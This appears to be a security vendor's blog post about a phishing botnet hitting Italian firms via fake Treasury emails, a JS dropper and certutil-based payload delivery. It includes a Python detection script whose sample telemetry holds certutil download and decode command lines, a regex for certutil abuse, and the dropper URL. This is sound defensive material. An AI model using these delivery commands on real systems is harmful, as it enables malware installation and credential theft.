Cynet Detects the Mail Botnet That Has Been Hitting Italian Companies

The Cynet 360 platform detects the latest botnet to hit Italian companies. The botnet arrives by way of a legitimate-looking email that appears to be sent by the Italian Department of Treasury, using subjects such as “Codici Tributo Acconti” (Tribute Advocates Codes). The attacker has chosen a subject that recipients are likely to fall for, since this phrase is used frequently in business administration. The emails, however, are sent from unknown addresses unrelated to the Italian Department of Treasury. Some of the reported addresses include: [email protected] or [email protected]

The mail contains a link that opens the browser and downloads a JS file. The script then issues a GET request to 239outdoors[.]com/themes5.php to drop a file called 1t.exe onto the host. This file, which looks like banker malware, is executed by the JS; it communicates with a C&C server, awaiting commands and sending the stolen credentials back to the C&C, along with details such as IP addresses and persistence.

Additionally, the URL appears to drop another malicious file, “Nuovo Documento 2008.” This is a .bat file that uses the “certutil for file delivery” technique to drop and execute another file, which in turn downloads an encoded payload. The technique is quiet and does not raise the usual red flags for suspicious activity. Once decoded and run, the payload unslaa.exe behaves the same as 1t.exe and communicates with the same C&C server.
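Detection logic for the chain described above, as an added example that is not Cynet's own code and not part of the original post: it scans constructed proxy and process-creation telemetry for three signals named in the write-up, a fetch of themes5.php from 239outdoors[.]com, a script host launching an executable, and certutil being used to download or decode a file, then correlates the hits per host. The pipe-delimited line format, the host names, the IP addresses and the certutil download URL are assumptions; only the dropper host, path and file names come from the post.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable

# Indicator taken from the write-up: the JS dropper fetches 1t.exe from this host and path.
DROPPER_HOST = "239outdoors.com"
DROPPER_PATH = "/themes5.php"

# Windows script hosts under which a mail-delivered .js file would execute.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# certutil switches used to fetch a remote file (-urlcache) and to decode a
# base64-encoded payload (-decode); both are legitimate switches that are rarely
# needed on a workstation.
CERTUTIL_ABUSE = re.compile(r"certutil(\.exe)?\s+.*-(urlcache|decode)\b", re.IGNORECASE)

# Constructed sample telemetry (hypothetical collector format, not real logs):
#   proxy|<client ip>|<method>|<url>|<status>
#   process|<host ip>|<parent image>|<command line>
SAMPLE_EVENTS = [
    "proxy|10.0.0.12|GET|http://239outdoors.com/themes5.php|200",
    "proxy|10.0.0.12|GET|http://intranet.example/index.html|200",
    "process|10.0.0.12|wscript.exe|C:\\Users\\u\\AppData\\Local\\Temp\\1t.exe",
    "process|10.0.0.12|cmd.exe|certutil.exe -urlcache -split -f http://PLACEHOLDER-URL/x.txt enc.txt",
    "process|10.0.0.12|cmd.exe|certutil.exe -decode enc.txt unslaa.exe",
    "process|10.0.0.13|explorer.exe|notepad.exe",
]


@dataclass
class Hit:
    rule: str
    host: str
    detail: str


def parse_event(line: str) -> dict:
    """Split one telemetry line into named fields according to its kind."""
    parts = line.rstrip("\n").split("|")
    kind = parts[0]
    if kind == "proxy":
        return {"kind": kind, "host": parts[1], "method": parts[2], "url": parts[3], "status": parts[4]}
    if kind == "process":
        return {"kind": kind, "host": parts[1], "parent": parts[2], "cmdline": parts[3]}
    raise ValueError(f"unknown event kind: {kind}")


def detect(lines: Iterable[str]) -> list[Hit]:
    """Apply the three rules to every event and return the hits in input order."""
    hits: list[Hit] = []
    for line in lines:
        ev = parse_event(line)
        if ev["kind"] == "proxy":
            url = ev["url"].lower()
            if DROPPER_HOST in url and DROPPER_PATH in url:
                hits.append(Hit("dropper_download", ev["host"], ev["url"]))
            continue
        parent = ev["parent"].lower()
        cmd = ev["cmdline"]
        # First token of the command line; paths containing spaces would need quoting.
        image = cmd.split()[0].lower() if cmd.split() else ""
        if parent in SCRIPT_HOSTS and image.endswith(".exe"):
            hits.append(Hit("script_host_spawned_exe", ev["host"], cmd))
        if CERTUTIL_ABUSE.search(cmd):
            hits.append(Hit("certutil_file_delivery", ev["host"], cmd))
    return hits


def correlate(hits: list[Hit], min_rules: int = 2) -> dict[str, set[str]]:
    """Group hits by host and keep hosts that tripped at least min_rules distinct rules,
    which separates one noisy event from the multi-stage chain described in the post."""
    by_host: dict[str, set[str]] = {}
    for h in hits:
        by_host.setdefault(h.host, set()).add(h.rule)
    return {host: rules for host, rules in by_host.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for h in found:
        print(f"{h.rule:26} {h.host:12} {h.detail}")
    print("hosts with a correlated chain:", correlate(found))
```

Each rule on its own is noisy (certutil has legitimate uses, and script hosts run plenty of benign logon scripts), so the correlation step is what makes the alert actionable: a host that downloads from the dropper URL, has a script host spawn a binary, and then runs certutil to decode a file matches the staged delivery the post describes.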

The Cynet 360 system detects and protects against these attacks. As part of best practices, we also recommend that you:

  • Educate employees to proceed cautiously with email attachments.
  • Check carefully before clicking links in email messages.
  • Still not sure? Contact us with any questions.